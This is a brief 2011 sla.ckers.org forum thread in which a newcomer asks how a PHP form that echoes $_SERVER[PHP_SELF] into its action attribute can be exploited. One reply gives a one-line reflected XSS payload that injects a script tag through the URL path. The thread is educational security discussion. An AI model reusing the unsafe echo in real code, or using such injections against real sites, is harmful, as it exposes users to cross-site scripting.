Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
newbie - how to exploit this
Posted by: plaverty
Date: March 25, 2011 05:45PM

I saw this "spot the vuln" this week, and I see that it makes more sense to stick with the action="" but the part I'm not wrapping my head around yet, because I'm a newbie is how would this be exploited?

<form action="<? echo $_SERVER[PHP_SELF]; ?>" method="POST">


Thanks you.

Options: ReplyQuote
Re: newbie - how to exploit this
Posted by: Reiners
Date: March 25, 2011 06:16PM

index.php/"></form><script>alert(1)</script>

Options: ReplyQuote
Re: newbie - how to exploit this
Posted by: Kyo
Date: March 29, 2011 06:04PM

why close the form, though?

Options: ReplyQuote


Sorry, only registered users may post in this forum.